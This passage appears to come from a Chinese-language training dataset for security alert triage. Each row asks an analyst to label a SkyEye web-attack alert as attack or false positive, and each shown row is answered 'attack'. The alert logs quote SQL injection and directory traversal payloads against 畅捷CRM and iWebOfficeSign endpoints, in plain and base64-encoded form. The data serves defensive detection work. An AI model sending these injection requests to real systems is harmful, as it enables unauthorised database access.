*/*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440707-SQL注入攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "11771", "h_url": "/webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(691)--"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688140", "vlan_id": "", "vuln_type": "发现目录穿越攻击行为", "rule_version_str": "3.0.1122.14572", "attack_type": "目录遍历", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.23.68.194", "sip_group": "", "repeat_count": "1", "type": "目录遍历", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732688140, "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 420, "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20null,null,%27omkzws%27||%27icyfzu%27,null,null,null,null,null,null,null%20from%20dual--", "dport": 30001, "vuln_name": "发现目录穿越攻击行为", "rsp_status": 0, "code_language": "通用", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": 400, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "xff": "", "sip": "223.160.174.104", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "public_date": "2018-08-16 18:57:22", "sport": 11773}, "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": "400", "skyeye_id": "", "payload": {"req_header": "R0VUIC9kZWZhdWx0cm9vdC9pV2ViT2ZmaWNlU2lnbi9PZmZpY2VTZXJ2ZXIuanNwLy4uLy4uL3B1YmxpYy9pU2lnbmF0dXJlSFRNTC5qc3AvRG9jdW1lbnRFZGl0LmpzcD9Eb2N1bWVudElEPTElMjclMjB1bmlvbiUyMHNlbGVjdCUyMG51bGwsbnVsbCwlMjdvbWt6d3MlMjd8fCUyN2ljeWZ6dSUyNyxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsJTIwZnJvbSUyMGR1YWwtLSBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "file_md5": "71ccacd67320f2729d33d1d79ce0cd95", "host": "218.76.15.56:30001", "host_state": "失败", "rule_key": "webids", "api": "218.76.15.56:30001/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp", "first_access_time": "2024-11-27 14:15:40", "hazard_level": "6", "accept-language": "en-US,en;q=0.9", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现目录穿越攻击行为", "alarm_sip": "172.23.68.194", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "4a381433886e37721b3ade444f084734", "proto": "http", "xff": "", "alarm_id": "20241127_6f6f5c2912b7e05e83a2f4d2ff8ee254", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "attack_chain": "0x02010000", "access_time": "2024-11-27 14:15:40", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "160B0000", "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "dip_addr": "局域网", "dport": "30001", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732688120", "code_language": "通用", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "public_date": "2018-08-16 18:57:22", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "DocumentEdit.jsp", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "420", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20null,null,%27omkzws%27||%27icyfzu%27,null,null,null,null,null,null,null%20from%20dual--", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002055d", "req_header": "GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20null,null,%27omkzws%27||%27icyfzu%27,null,null,null,null,null,null,null%20from%20dual-- HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567901-发现目录穿越攻击行为", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "sport": "11773", "h_url": "/defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1%27%20union%20select%20null,null,%27omkzws%27||%27icyfzu%27,null,null,null,null,null,null,null%20from%20dual--", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688140", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732688140, "vuln_harm": "攻击者可以利用该漏洞获取服务器敏感信息,从而获取服务器管理权限。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.23.68.194", "site_app": "", "hit_end": 74, "uri": "/webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(691)--", "dport": 30001, "vuln_name": "畅捷CRM系统SQL注入漏洞", "rsp_status": 0, "code_language": "", "solution": "1、请尽快升级到最新安全版本。", "hit_start": 54, "detail_info": "畅捷CRM系统是面向小企业全力打造的简单、实用的客户关系管理应用,帮助企业用好自己的客户资源、管好商机跟进过程、引导好业务员跟单行为。畅捷CRM系统存在SQL注入漏洞,攻击者可以利用该漏洞获取服务器敏感信息,从而获取服务器管理权限。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "畅捷CRM系统是面向小企业全力打造的简单、实用的客户关系管理应用,帮助企业用好自己的客户资源、管好商机跟进过程、引导好业务员跟单行为。畅捷CRM系统存在SQL注入漏洞,攻击者可以利用该漏洞获取服务器敏感信息,从而获取服务器管理权限。", "public_date": "2022-11-14 19:03:55", "sport": 11771}, "detail_info": "畅捷CRM系统是面向小企业全力打造的简单、实用的客户关系管理应用,帮助企业用好自己的客户资源、管好商机跟进过程、引导好业务员跟单行为。畅捷CRM系统存在SQL注入漏洞,攻击者可以利用该漏洞获取服务器敏感信息,从而获取服务器管理权限。", "file_md5": "82e2f99d50565a9b3c1be03ae99dc9e8", "rule_key": "webids", "api": "218.76.15.56:30001/webservice/get_usedspace.php", "first_access_time": "2024-11-27 14:15:40", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "畅捷CRM系统SQL注入漏洞", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "42237157feac1ee64712c0b0ed4c5a62", "site_id": "-1159 UNION ALL SELECT md5(691)--", "xff": "", "vuln_desc": "畅捷CRM系统是面向小企业全力打造的简单、实用的客户关系管理应用,帮助企业用好自己的客户资源、管好商机跟进过程、引导好业务员跟单行为。畅捷CRM系统存在SQL注入漏洞,攻击者可以利用该漏洞获取服务器敏感信息,从而获取服务器管理权限。", "attack_chain": "0x02020000", "vuln_harm": "攻击者可以利用该漏洞获取服务器敏感信息,从而获取服务器管理权限。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688120", "code_language": "", "public_date": "2022-11-14 19:03:55", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "74", "h_proto_version": "HTTP/1.1", "uri": "/webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(691)--", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021390", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "畅捷CRM系统SQL注入漏洞", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、请尽快升级到最新安全版本。", "hit_start": "54", "skyeye_id": "", "payload": {"req_header": "R0VUIC93ZWJzZXJ2aWNlL2dldF91c2Vkc3BhY2UucGhwP3NpdGVfaWQ9LTExNTklMjBVTklPTiUyMEFMTCUyMFNFTEVDVCUyMG1kNSg2OTEpLS0gSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_0317fd3dd746b9263c6c203fbd19f271", "access_time": "2024-11-27 14:15:40", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/webservice/get_usedspace.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "get_usedspace.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(691)-- HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268571536-畅捷CRM系统SQL注入漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "11771", "h_url": "/webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5(691)--"} | 攻击 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.